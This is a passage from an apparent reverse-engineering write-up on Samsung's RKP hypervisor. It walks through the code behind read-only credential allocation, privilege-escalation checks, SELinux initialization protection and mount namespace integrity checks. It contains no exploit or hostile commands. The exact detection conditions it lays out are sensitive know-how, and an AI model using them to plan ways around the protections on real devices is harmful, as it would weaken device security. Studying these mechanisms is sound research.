rcu_assign_pointer(current->cred, new_ro);
put_cred(new);
}
else {
// ...
}
// ...
}
prepare_ro_creds
allocates a new read-only cred
structure from the cred_jar_ro
cache. We have seen in the Credentials Protection section that new fields have been added to this structure. In particular, the use_cnt
field, the reference count for the cred
structure, needs to be modified often. To work around that, a pointer to a read-write structure containing the reference count is stored in the read-only cred
structure. prepare_ro_creds
thus also allocates a new read-write reference count. It then allocates a new read-only task_security_struct
from the tsec_jar
.
It uses the rkp_cred_fill_params
macro and invokes the RKP_KDP_X46
command to let the hypervisor perform its verifications and copy the data from the read-write version of the cred
structure (the argument) to the read-only one (the newly allocated one). It finally does some sanity-checking, depending on where prepare_ro_creds
was called, before returning the read-only version of the cred
structure.
static struct cred *prepare_ro_creds(struct cred *old, int kdp_cmd, u64 p)
{
u64 pgd =(u64)(current->mm?current->mm->pgd:swapper_pg_dir);
struct cred *new_ro;
void *use_cnt_ptr = NULL;
void *rcu_ptr = NULL;
void *tsec = NULL;
cred_param_t cred_param;
new_ro = kmem_cache_alloc(cred_jar_ro, GFP_KERNEL);
if (!new_ro)
panic("[%d] : kmem_cache_alloc() failed", kdp_cmd);
use_cnt_ptr = kmem_cache_alloc(usecnt_jar,GFP_KERNEL);
if (!use_cnt_ptr)
panic("[%d] : Unable to allocate usage pointer\n", kdp_cmd);
rcu_ptr = get_usecnt_rcu(use_cnt_ptr);
((struct ro_rcu_head*)rcu_ptr)->bp_cred = (void *)new_ro;
tsec = kmem_cache_alloc(tsec_jar, GFP_KERNEL);
if (!tsec)
panic("[%d] : Unable to allocate security pointer\n", kdp_cmd);
rkp_cred_fill_params(old,new_ro,use_cnt_ptr,tsec,kdp_cmd,p);
uh_call(UH_APP_RKP, RKP_KDP_X46, (u64)&cred_param, 0, 0, 0);
if (kdp_cmd == RKP_CMD_COPY_CREDS) {
if ((new_ro->bp_task != (void *)p)
|| new_ro->security != tsec
|| new_ro->use_cnt != use_cnt_ptr) {
panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#", kdp_cmd, new_ro->bp_task,(void *)p,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr);
}
}
else {
if ((new_ro->bp_task != current)||
(current->mm
&& new_ro->bp_pgd != (void *)pgd) ||
(new_ro->security != tsec) ||
(new_ro->use_cnt != use_cnt_ptr)) {
panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#, pgd=#%p:%p#", kdp_cmd, new_ro->bp_task,current,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr,new_ro->bp_pgd,(void *)pgd);
}
}
rocred_uc_set(new_ro, 2);
set_cred_subscribers(new_ro, 0);
get_group_info(new_ro->group_info);
get_uid(new_ro->user);
get_user_ns(new_ro->user_ns);
#ifdef CONFIG_KEYS
key_get(new_ro->session_keyring);
key_get(new_ro->process_keyring);
key_get(new_ro->thread_keyring);
key_get(new_ro->request_key_auth);
#endif
validate_creds(new_ro);
return new_ro;
}
The rkp_cred_fill_params
macro simply fills the fields of the cred_param_t
structure given as an argument to the RKP command.
typedef struct cred_param{
struct cred *cred;
struct cred *cred_ro;
void *use_cnt_ptr;
void *sec_ptr;
unsigned long type;
union {
void *task_ptr;
u64 use_cnt;
};
}cred_param_t;
#define rkp_cred_fill_params(crd,crd_ro,uptr,tsec,rkp_cmd_type,rkp_use_cnt) \
do { \
cred_param.cred = crd; \
cred_param.cred_ro = crd_ro; \
cred_param.use_cnt_ptr = uptr; \
cred_param.sec_ptr= tsec; \
cred_param.type = rkp_cmd_type; \
cred_param.use_cnt = (u64)rkp_use_cnt; \
} while(0)
On the hypervisor side, the command is handled by the rkp_cmd_assign_creds
function, which calls rkp_assign_creds
.
rkp_assign_creds
does a lot of checks that can be summarized as follows (where "current" refers to the cred
of the current
task, "old" refers to the read-write cred
, and "new" refers to the read-only cred
structure):
cred
structure must be protected by the hypervisor;rkp_check_pe
and from_zyg_adbd
are called to detect privilege escalation;CRED_FLAG_LOD
;check_privilege_escalation
is called for each UID, EUID, GID, and EGID pair of the old and current tasks to detect privilege escalation;cred
is copied into the new cred
structure, and its use_cnt
field is set;copy_creds
callers, the back-pointers of the new cred
structure are set from the current task;override_creds
caller, the new cred
structure is marked CRED_FLAG_ORPHAN
if the usage count given as argument is less than or equal to 1, or it is unmarked otherwise;copy_creds
caller, the back-pointer is set from the task being copied;task_security_struct
must be protected by the hypervisor;task_security_struct
is copied into the new task_security_struct
, and the back-pointers are set accordingly;CRED_FLAG_MARK_PPT
, the new task is marked CRED_FLAG_MARK_PPT
.void rkp_assign_creds(saved_regs_t* regs) {
// ...
// Convert the VA of the argument structure to a PA.
cred_param = rkp_get_pa(regs->x2);
if (!cred_param) {
uh_log('L', "rkp_kdp.c", 662, "NULL pData");
return;
}
// Get the current task_struct in the kernel.
curr_task_va = rkp_ns_get_current();
// Convert the current task_struct VA into a PA.
curr_task = rkp_get_pa(curr_task_va);
// Get the current cred structure from the current task_struct.
curr_cred_va = *(curr_task + 8 * rkp_cred->TASK_CRED_OFFSET);
// Convert the current cred structure VA into a PA.
curr_cred = rkp_get_pa(curr_cred_va);
// Get the target RW cred from the argument structure and convert it from a VA to a PA.
targ_cred = rkp_get_pa(cred_param->cred);
// Get the target RO cred from the argument structure and convert it from a VA to a PA.
targ_cred_ro = rkp_get_pa(cred_param->cred_ro);
// Get the current task_security_struct from the current cred structure.
curr_secptr_va = *(curr_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
// Convert the current task_security_struct from a VA to a PA.
curr_secptr = rkp_get_pa(curr_secptr_va);
// Sanity-check: the current cred structure must be non NULL.
if (!curr_cred) {
uh_log('L', "rkp_kdp.c", 489, "\nCurrent Cred is NULL %lx %lx %lx\n ", curr_task, curr_task_va, 0);
return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_task, 0);
}
// Sanity-check: the current task_security_struct must be non NULL, or RKP must not be deferred initialized.
if (!curr_secptr && rkp_deferred_inited) {
uh_log('L', "rkp_kdp.c", 495, "\nCurrent sec_ptr is NULL %lx %lx %lx\n ", curr_task, curr_task_va, curr_cred);
return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_cred, 0);
}
// Get the back-pointer (a cred structure pointer) of the current task_security_struct.
bp_cred_va = *(curr_secptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET);
// Get the back-pointer (a task_struct pointer) of the current cred structure.
bp_task_va = *(curr_cred + 8 * rkp_cred->CRED_BP_TASK_OFFSET);
// Sanity-check: the back-pointers must point to the current cred structure and current task_struct respectively.
if (bp_cred_va != curr_cred_va || bp_task_va != curr_task_va) {
uh_log('L', "rkp_kdp.c", 502, "\n Integrity Check failed_1 %lx %lx %lx\n ", bp_cred_va, curr_cred_va, curr_cred);
uh_log('L', "rkp_kdp.c", 503, "\n Integrity Check failed_2 %lx %lx %lx\n ", bp_task_va, curr_task_va, curr_task);
rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", bp_cred_va, curr_cred_va, curr_secptr);
return;
}
// Sanity-check: the target RW and RO cred structures must be non NULL and the target RO cred structure must be marked
// as `CRED` in the physmap.
if (!targ_cred || !targ_cred_ro || rkp_phys_map_verify_cred(targ_cred_ro)) {
uh_log('L', "rkp_kdp.c", 699, "rkp_assign_creds !! %lx %lx", targ_cred_ro, targ_cred);
return;
}
skip_checks = 0;
// Get the type field (used to process marking) from the current cred structure.
curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
// If the current task is not a "Linux on Dex" process.
if ((curr_flags & CRED_FLAG_LOD) == 0) {
// Get the uid, euid, gid, egid fields from the current cred structure.
curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
// If none of those fields have the LOD prefix (0x61a8).
if ((curr_uid & 0xffff0000) != 0x61a80000 && (curr_euid & 0xffff0000) != 0x61a80000 &&
(curr_gid & 0xffff0000) != 0x61a80000 && (curr_egid & 0xffff0000) != 0x61a80000) {
// And if the device is locked.
if (!rkp_cred->VERIFIED_BOOT_STATE) {
// Call `rkp_check_pe` and `from_zyg_adbd` to detect instances of privilege escalation.
if (rkp_check_pe(targ_cred, curr_cred) && from_zyg_adbd(curr_task, curr_cred)) {
uh_log('L', "rkp_kdp.c", 717, "Priv Escalation! %lx %lx %lx", targ_cred,
*(targ_cred + 8 * rkp_cred->CRED_EUID_OFFSET), *(curr_cred + 8 * rkp_cred->CRED_EUID_OFFSET));
// If either of these 2 functions returned true, call `rkp_privilege_escalation` to handle it.
return rkp_privilege_escalation(targ_cred, cred_pa, 1);
}
}
// If the device is locked, or no privilege escalation was detected, skip the next checks.
skip_checks = 1;
}
// If the current task has a LOD prefixed field, mark it as `CRED_FLAG_LOD`.
else {
*(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) = curr_flags | CRED_FLAG_LOD;
}
}
// If the checks are not skipped.
if (!skip_checks) {
// Get the uid field of the target RW cred structure.
targ_uid = *(targ_cred + rkp_cred->CRED_UID_OFFSET);
priv_esc = 0;
// If the uid is not INET (3003).
if (targ_uid != 3003) {
// Get the uid field of the current cred structure.
curr_uid = *(cred_pa + 4 * rkp_cred->CRED_UID_OFFSET);
priv_esc = 0;
// Call `check_privilege_escalation` to detect privilege escalation.
if (check_privilege_escalation(targ_uid, curr_uid)) {
uh_log('L', "rkp_kdp.c", 382, "\n LOD: uid privilege escalation curr_uid = %ld targ_uid = %ld \n", curr_uid,
targ_uid);
// If the function returns true, privilege escalation was detected.
priv_esc = 1;
}
}
// Get the euid field of the target RW cred structure.
targ_euid = *(targ_cred + rkp_cred->CRED_EUID_OFFSET);
// If the euid is not INET (3003).
if (targ_euid != 3003) {
// Get the euid field of the current cred structure.
curr_euid = *(cred_pa + 4 * rkp_cred->CRED_EUID_OFFSET);
// Call `check_privilege_escalation` to detect privilege escalation.
if (check_privilege_escalation(targ_euid, curr_euid)) {
uh_log('L', "rkp_kdp.c", 387, "\n LOD: euid privilege escalation curr_euid = %ld targ_euid = %ld \n", curr_euid,
targ_euid);
// If the function returns true, privilege escalation was detected.
priv_esc = 1;
}
}
// Get the gid field of the target RW cred structure.
targ_gid = *(targ_cred + rkp_cred->CRED_GID_OFFSET);
// If the gid is not INET (3003).
if (targ_gid != 3003) {
// Get the gid field of the current cred structure.
curr_gid = *(cred_pa + 4 * rkp_cred->CRED_GID_OFFSET);
// Call `check_privilege_escalation` to detect privilege escalation.
if (check_privilege_escalation(targ_gid, curr_gid)) {
uh_log('L', "rkp_kdp.c", 392, "\n LOD: Gid privilege escalation curr_gid = %ld targ_gid = %ld \n", curr_gid,
targ_gid);
// If the function returns true, privilege escalation was detected.
priv_esc = 1;
}
}
// Get the egid field of the target RW cred structure.
targ_egid = *(targ_cred + rkp_cred->CRED_EGID_OFFSET);
// If the egid is not INET (3003).
if (targ_egid != 3003) {
// Get the egid field of the current cred structure.
curr_egid = *(cred_pa + 4 * rkp_cred->CRED_EGID_OFFSET);
// Call `check_privilege_escalation` to detect privilege escalation.
if (check_privilege_escalation(targ_egid, curr_egid)) {
uh_log('L', "rkp_kdp.c", 397, "\n LOD: egid privilege escalation curr_egid = %ld targ_egid = %ld \n", curr_egid,
targ_egid);
// If the function returns true, privilege escalation was detected.
priv_esc = 1;
}
}
// If privilege escalation was detected on the UID, EUID, GID or EGID.
if (priv_esc) {
uh_log('L', "rkp_kdp.c", 705, "Linux on Dex Priv Escalation! %lx ", targ_cred);
if (curr_task) {
curr_comm = curr_task + 8 * rkp_cred->TASK_COMM_OFFSET;
uh_log('L', "rkp_kdp.c", 707, curr_comm);
}
// Call `rkp_privilege_escalation` to handle it.
return rkp_privilege_escalation(param_cred_pa, cred_pa, 1);
}
}
// The checks passed, copy the RW cred into the RO cred structure.
memcpy(targ_cred_ro, targ_cred, rkp_cred->CRED_SIZE);
cmd_type = cred_param->type;
// Set the use_cnt field of the RO cred structure.
*(targ_cred_ro + 8 * rkp_cred->CRED_USE_CNT) = cred_param->use_cnt_ptr;
// If the caller of `prepare_ro_creds` was not `copy_creds`.
if (cmd_type != RKP_CMD_COPY_CREDS) {
// Get the current mm_struct from the current cred structure.
curr_mm_va = *(current_pa + 8 * rkp_cred->TASK_MM_OFFSET);
// If the current mm_struct is not NULL.
if (curr_mm_va) {
curr_mm = rkp_get_pa(curr_mm_va);
// Extract the current PGD from it.
curr_pgd_va = *(curr_mm + 8 * rkp_cred->MM_PGD_OFFSET);
} else {
// Otherwise, get it from TTBR1_EL1.
curr_pgd_va = rkp_get_va(get_ttbr1_el1() & 0xffffffffc000);
}
// Set the bp_pgd and bp_task fields of the RO cred structure.
*(targ_cred_ro + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = curr_pgd_va;
*(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = curr_task_va;
// If the caller of `prepare_ro_creds` is `override_creds`.
if (cmd_type == RKP_CMD_OVRD_CREDS) {
// If the argument structure usage counter is lower or equal to 1, unmark the target RO cred as
// `CRED_FLAG_ORPHAN`.
if (cred_param->use_cnt <= 1) {
*(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_ORPHAN;
}
// Otherwise, mark the target RO cred as `CRED_FLAG_ORPHAN`.
else {
*(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_ORPHAN;
}
}
}
// If the caller of `prepare_ro_creds` is `copy_creds`, set the bp_task field of the RO cred structure to the current
// task_struct.
else {
*(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = cred_param->task_ptr;
}
// Get the new task_security_struct from the argument structure.
newsec_ptr_va = cred_param->sec_ptr;
// Get the target RO cred structure from the argument structure.
targ_cred_ro_va = cred_param->cred_ro;
// If the new task_security_struct is not NULL.
if (newsec_ptr_va) {
// Convert the new task_security_struct from a VA to a PA.
newsec_ptr = rkp_get_pa(newsec_ptr_va);
// Get the old task_security_struct from the target RW cred structure.
oldsec_ptr_va = *(targ_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
// Convert the old task_security_struct from a VA to a PA.
oldsec_ptr = rkp_get_pa(oldsec_ptr_va);
// Call `chk_invalid_sec_ptr` to check if the new task_security_struct is hypervisor-protected, and ensure both the
// old and the new task_security_struct are non NULL.
if (chk_invalid_sec_ptr(newsec_ptr) || !oldsec_ptr || !newsec_ptr) {
uh_log('L', "rkp_kdp.c", 594, "Invalid sec pointer [assign_secptr] %lx %lx %lx", newsec_ptr_va, newsec_ptr,
oldsec_ptr);
// Otherwise, trigger a policy violation.
rkp_policy_violation("Data Protection Violation %lx %lx %lx", newsec_ptr_va, oldsec_ptr, newsec_ptr);
}
// If the old and new task_security_struct are valid.
else {
// Get the new sid from the new task_security_struct.
new_sid = *(newsec_ptr + 4);
// Get the old sid from the old task_security_struct.
old_sid = *(oldsec_ptr + 4);
// If RKP is deferred initialized and the SID jumps from below to above `sysctl_net` (20).
if (rkp_deferred_inited && old_sid < 20 && new_sid > 20) {
uh_log('L', "rkp_kdp.c", 607, "Selinux Priv Escalation !! [assign_secptr] %lx %lx ", old_sid, new_sid);
// Trigger a policy violation.
rkp_policy_violation("Data Protection Violation %lx %lx %lx", old_sid, new_sid, 0);
} else {
// Copy the old task_security_struct to the new one.
memcpy(newsec_ptr, oldsec_ptr, rkp_cred->SP_SIZE);
// Set the security field of the target RO cred structure to the new task_security_struct.
*(targ_cred_ro + 8 * rkp_cred->CRED_SECURITY_OFFSET) = newsec_ptr_va;
// Set the bp_cred field of the new task_security_struct to the target RO cred structure.
*(newsec_ptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET) = targ_cred_ro_va;
}
}
}
// If the target task_security_struct is NULL, trigger a policy violation.
else {
uh_log('L', "rkp_kdp.c", 583, "Security Pointer is NULL [assign_secptr] %lx", 0);
rkp_policy_violation("Data Protection Violation", 0, 0, 0);
}
// If the device is unlocked, return immediately.
if (rkp_cred->VERIFIED_BOOT_STATE) {
return;
}
// Get the type field from the RO cred structure.
targ_flags = *(targ_cred_ro + 8 * rkp_creds->CRED_FLAGS_OFFSET);
// If the target task is not marked as `CRED_FLAG_MARK_PPT`.
if ((targ_flags & CRED_FLAG_MARK_PPT) != 0) {
// Get the parent task_struct of the current task_struct.
parent_task_va = *(curr_task + 8 * rkp_cred->TASK_PARENT_OFFSET);
// Convert the parent task_struct from a VA to a PA.
parent_task = rkp_get_pa(parent_task_va);
// Get the parent cred structure from the parent task_struct.
parent_cred_va = *(parent_task + 8 * rkp_cred->TASK_CRED_OFFSET);
// Convert the parent cred structure from a VA to a PA.
parent_cred = rkp_get_pa(parent_cred_va);
// Get the type field from the parent cred structure.
parent_flags = *(parent_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
// If the parent task is marked as `CRED_FLAG_MARK_PPT`.
if ((parent_flags & CRED_FLAG_MARK_PPT) != 0) {
// Mark the current task as `CRED_FLAG_MARK_PPT` too.
*(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_CHILD_PPT;
}
}
}
Let's now go over the different functions that are called by rkp_assign_creds
. In particular, the functions that try to detect privilege escalation are really interesting from a security standpoint.
The rkp_ns_get_current
function returns the current
task of the kernel (stored in SP_EL0
or SP_EL1
).
uint64_t rkp_ns_get_current() {
// SPSel, Stack Pointer Select.
//
// SP, bit [0]: Stack pointer to use.
if (get_sp_sel()) {
return get_sp_el0();
} else {
return get_sp_el1();
}
}
The rkp_check_pe
function is called for non "Linux on Dex" processes when the device is locked. For each UID, GID, EUID, and EGID pair for the target RW cred
and current cred
structure, it calls the check_pe_id
function to decide if this is an instance of privilege escalation. For effective IDs, the target one must also be lower than the current one. Otherwise, it is not considered privilege escalation.
bool rkp_check_pe(int64_t targ_cred, int64_t curr_cred) {
// ...
// Get the uid field of the current cred structure.
curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
// Get the uid field of the target RW cred structure.
targ_uid = *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET);
// Call `check_pe_id` to detect privilege escalation.
if (check_pe_id(targ_uid, curr_uid)) {
return 1;
}
// Get the gid field of the current cred structure.
curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
// Get the gid field of the target RW cred structure.
targ_gid = *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET);
// Call `check_pe_id` to detect privilege escalation.
if (check_pe_id(targ_gid, curr_gid)) {
return 1;
}
// Get the euid field of the current cred structure.
curr_ueid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
// Get the euid field of the target RW cred structure.
targ_euid = *(targ_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
// If the target euid is lower than the current one and `check_pe_id` returns true, this is privilege escalation.
if (targ_euid < curr_uid && check_pe_id(targ_euid, curr_euid)) {
return 1;
}
// Get the egid field of the current cred structure.
curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
// Get the egid field of the target RW cred structure.
targ_egid = *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
// If the target egid is lower than the current one and `check_pe_id` returns true, this is privilege escalation.
if (targ_egid < curr_gid && check_pe_id(targ_egid, curr_egid)) {
return 1;
}
return 0;
}
check_pe_id
returns true if the current ID is bigger and the target ID is smaller or equal to 1000 (SYSTEM
).
int64_t check_pe_id(uint32_t targ_id, uint32_t curr_id) {
// PE is detected if the current ID is bigger and the target ID is smaller or equal to `SYSTEM` (1000).
return curr_id > 1000 && targ_id <= 1000;
}
from_zyg_adbd
is called under the same conditions as rkp_check_pe
. It returns true if the current task is marked CRED_FLAG_CHILD_PPT
or if it is a child of zygote
, zygote64
, or adbd
.
int64_t from_zyg_adbd(int64_t curr_task, int64_t curr_cred) {
// ...
// Get the type field from the current cred structure.
curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
// If the current task is marked as CRED_FLAG_CHILD_PPT, return true.
if ((curr_flags & CRED_FLAG_CHILD_PPT) != 0) {
return 1;
}
// Iterate on the parents of the current task_struct.
task = curr_task;
while (1) {
// Get the pid field of the parent task_struct.
task_pid = *(task + 4 * rkp_cred->TASK_PID_OFFSET);
// If the parent pid is zero, return false.
if (!task_pid) {
return 0;
}
// Get the comm field of the parent task_struct.
task_comm = task + 8 * rkp_cred->TASK_COMM_OFFSET;
// Copy the task name into a local buffer.
memcpy(comm, task_comm, sizeof(comm));
// If the parent task is zygote, zygote64 or adbd, return true.
if (!strcmp(comm, "zygote") || !strcmp(comm, "zygote64") || !strcmp(comm, "adbd")) {
return 1;
}
// Get the parent field of the parent task_struct.
parent_va = *(task + 8 * rkp_cred->TASK_PARENT_OFFSET);
// Convert the parent task_struct from a VA to a PA.
task = parent_pa = rkp_get_pa(parent_va);
}
}
check_privilege_escalation
is called for each UID, EUID, GID, and EGID pair of the target RW cred
and current cred
structure. It returns true if the current ID is LOD prefixed (0x61a8xxxx) and the target ID isn't and isn't also equal to -1.
bool check_privilege_escalation(int32_t targ_id, int32_t curr_id) {
// PE is detected if the current ID is LOD prefixed but the target ID is not, and the target ID is not -1.
return ((curr_id - 0x61a80000) <= 0xffff && (targ_id - 0x61a80000) > 0xffff && targ_id != -1);
}
When privilege escalation is detected in rkp_assign_creds
, rkp_privilege_escalation
is called. It simply triggers a policy violation.
int64_t rkp_privilege_escalation(int64_t targ_cred, int64_t curr_cred, int64_t flag) {
uh_log('L', "rkp_kdp.c", 461, "Priv Escalation - Current %lx %lx %lx", *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET),
*(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
uh_log('L', "rkp_kdp.c", 462, "Priv Escalation - Passed %lx %lx %lx", *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET),
*(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET), *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET));
return rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", targ_cred, curr_cred, flag);
}
The chk_invalid_sec_ptr
function is called to verify that the new task_security_struct
is valid (aligned on the structure size) and hypervisor-protected (marked as SEC_PTR
in the physmap).
int64_t chk_invalid_sec_ptr(uint64_t sec_ptr) {
rkp_phys_map_lock(sec_ptr);
// The start and end addresses of the task_security_struct must be marked as `SEC_PTR` on the physmap, and it must
// also be aligned on the size of this structure.
if (!sec_ptr || !is_phys_map_sec_ptr(sec_ptr) || !is_phys_map_sec_ptr(sec_ptr + rkp_cred->SP_SIZE - 1) ||
sec_ptr != sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE) {
uh_log('L', "rkp_kdp.c", 186, "Invalid Sec Pointer %lx %lx %lx", is_phys_map_sec_ptr(sec_ptr), sec_ptr,
sec_ptr - sec_ptr / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE);
rkp_phys_map_unlock(sec_ptr);
return 1;
}
rkp_phys_map_unlock(sec_ptr);
return 0;
}
In addition to protecting the task_security_struct
of task, and making the selinux_enforcing
and selinux_enabled
global variables read-only, Samsung RKP also protects ss_initialized
. This global variable, which indicates if SELinux is initialized, was targeted in a previous RKP bypass. To set this variable after the policy has been loaded, the kernel calls the hypervisor in the security_load_policy
function. This function invokes the RKP_KDP_X60
command.
int security_load_policy(void *data, size_t len)
{
// ...
uh_call(UH_APP_RKP, RKP_KDP_X60, (u64)&ss_initialized, 1, 0, 0);
// ...
}
On the hypervisor side, this command is handled by the rkp_cmd_selinux_initialized
function, which calls rkp_selinux_initialized
. This function ensures ss_initialized
is located in the kernel's rodata
section and that the kernel is setting it to 1, before performing the write.
void rkp_selinux_initialized(saved_regs_t* regs) {
// ...
// Get the VA of `ss_initialized` from register x2.
ss_initialized_va = regs->x2;
// Get the value to set it to from register x3.
value = regs->x3;
// Convert the VA of `ss_initialized` to a PA.
ss_initialized = rkp_get_pa(ss_initialized_va);
if (ss_initialized) {
// Ensure the `ss_initialized` is located in the kernel rodata section.
if (ss_initialized_va < SRODATA || ss_initialized_va > ERODATA) {
// Trigger a policy violation if it isn't.
rkp_policy_violation("RKP_ba9b5794 %lxRKP_69d2a377%lx, %lxRKP_ba5ec51d", ss_initialized_va);
}
// Ensure it is located at the same address that was set in `rkp_cred_init` and provided by the kernel in
// `kdp_init`.
else if (ss_initialized == rkp_cred->SS_INITIALIZED_VA) {
// The global variable can only be set to 1, never to any other value.
if (value == 1) {
// Perform the write on behalf of the kernel.
*ss_initialized = value;
uh_log('L', "rkp_kdp.c", 1199, "RKP_3a152688 %d", 1);
} else {
// Trigger a policy violation for other values.
rkp_policy_violation("RKP_3ba4a93d");
}
}
// Not sure what this is about. SELINUX is the PA of the selinux field of the rkp_init_t structure located on the
// stack of the kernel function `kdp_init`. Maybe this is here to support older or future kernel versions?
else if (ss_initialized == rkp_cred->SELINUX) {
// This global variable can only be changed from any value but 1 to 1.
if (value == 1 || *ss_initialized != 1) {
// Perform the write on behalf of the kernel.
*ss_initialized = value;
uh_log('L', "rkp_kdp.c", 1212, "RKP_8df36e46 %d", value);
} else {
// Trigger a policy violation for other values.
rkp_policy_violation("RKP_cef38ae5");
}
}
// Trigger a policy violation if the address is unexpected.
else {
rkp_policy_violation("RKP_ced87e02");
}
} else {
uh_log('L', "rkp_kdp.c", 1181, "RKP_0a7ac3b1\n");
}
}
One last feature offered by the hypervisor is the protection of the mount namespaces (a set of filesystem mounts that are visible to a process).
The vfsmount
instances, like the cred
and task_security_struct
structure instances, are allocated in read-only pages. This structure also gets a new field for storing the back-pointer to the mount
structure that owns this instance.
struct vfsmount {
// ...
struct mount *bp_mount; /* pointer to mount*/
// ...
} __randomize_layout;
The mount
structure was also modified to contain a pointer to the vfsmount
structure, instead of the structure itself.
struct mount {
// ...
struct vfsmount *mnt;
// ...
} __randomize_layout;
In the Credentials Protection section, we explained that the security_integrity_current
function is called in each SELinux security hook and that this function calls cmp_ns_integrity
to verify the integrity of the mount namespace.
cmp_ns_integrity
retrieves the nsproxy
structure (that contains pointers to all per-process namespaces) for the current
task, the mnt_namespace
from it, and the root mount
from this structure. The integrity verification is then performed by checking if the back-pointer of the vfsmount
structure points to the mount
structure.
extern u8 ns_prot;
unsigned int cmp_ns_integrity(void)
{
struct mount *root = NULL;
struct nsproxy *nsp = NULL;
int ret = 0;
if((in_interrupt()
|| in_softirq())){
return 0;
}
nsp = current->nsproxy;
if(!ns_prot || !nsp ||
!nsp->mnt_ns) {
return 0;
}
root = current->nsproxy->mnt_ns->root;
if(root != root->mnt->bp_mount){
printk("\n RKP44_3 Name Space Mismatch %p != %p\n nsp = %p mnt_ns %p\n",root,root->mnt->bp_mount,nsp,nsp->mnt_ns);
ret = 1;
}
return ret;
}
The vfsmount
structures are allocated in the mnt_alloc_vfsmount
function, using the read-only vfsmnt_cache
cache. This function call rkp_init_ns
to initialize the back-pointer.
static int mnt_alloc_vfsmount(struct mount *mnt)
{
struct vfsmount *vfsmnt = NULL;
vfsmnt = kmem_cache_alloc(vfsmnt_cache, GFP_KERNEL);
if(!vfsmnt)
return 1;
spin_lock(&mnt_vfsmnt_lock);
rkp_init_ns(vfsmnt,mnt);
// vfsmnt->bp_mount = mnt;
mnt->mnt = vfsmnt;
spin_unlock(&mnt_vfsmnt_lock);
return 0;
}
And rkp_init_ns
simply invokes the RKP_KDP_X52
command, passing it the vfsmount
and mount
instances.
void rkp_init_ns(struct vfsmount *vfsmnt,struct mount *mnt)
{
uh_call(UH_APP_RKP, RKP_KDP_X52, (u64)vfsmnt, (u64)mnt, 0, 0);
}
On the hypervisor side, the command is handled by the rkp_cmd_init_ns
function, which calls rkp_init_ns_hyp
. It calls chk_invalid_ns
to verify that the new vfsmount
structure is valid before memset
ing it and setting its back-pointer to the mount
instance.
void rkp_init_ns_hyp(saved_regs_t* regs) {
// ...
// Convert the VA of the vfsmount structure into a PA.
vfsmnt = rkp_get_pa(regs->x2);
// Ensure the structure is valid and hypervisor-protected.
if (!chk_invalid_ns(vfsmnt)) {
// Reset all of its content.
memset(vfsmnt, 0, rkp_cred->NS_SIZE);
// Set the back-pointer to the mount structure given as argument.
*(vfsmnt + 8 * rkp_cred->BPMNT_VFSMNT_OFFSET) = regs->x3;
}
}
chk_invalid_ns
verifies that the new vfsmount
instance is valid (aligned on the structure size) and is hypervisor-protected (marked as NS
in the physmap).
int64_t chk_invalid_ns(uint64_t vfsmnt) {
// The vfsmount instance must be aligned on the size of the structure.
if (!vfsmnt || vfsmnt != vfsmnt / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE) {
return 1;
}
rkp_phys_map_lock(vfsmnt);
// Ensure it is marked as `NS` in the physmap.
if (!is_phys_map_ns(vfsmnt)) {
uh_log('L', "rkp_kdp.c", 882, "Name space physmap verification failed !!!!! %lx", vfsmnt);
rkp_phys_map_unlock(vfsmnt);
return 1;
}
rkp_phys_map_unlock(vfsmnt);
return 0;
}
The vfsmount
structure contains various fields that need to be changed at some point by the kernel. Similarly to other protected structures, it cannot do that by itself and needs to call into the hypervisor instead.
The table below lists, for each field, the kernel function invoking the command and the hypervisor function handling that command.
Field | Kernel Function | Hypervisor Function |
---|---|---|
mnt_root /mnt_sb |
rkp_set_mnt_root_sb |
rkp_cmd_ns_set_root_sb |
mnt_flags |
rkp_assign_mnt_flags |
rkp_cmd_ns_set_flags |
data |
rkp_set_data |
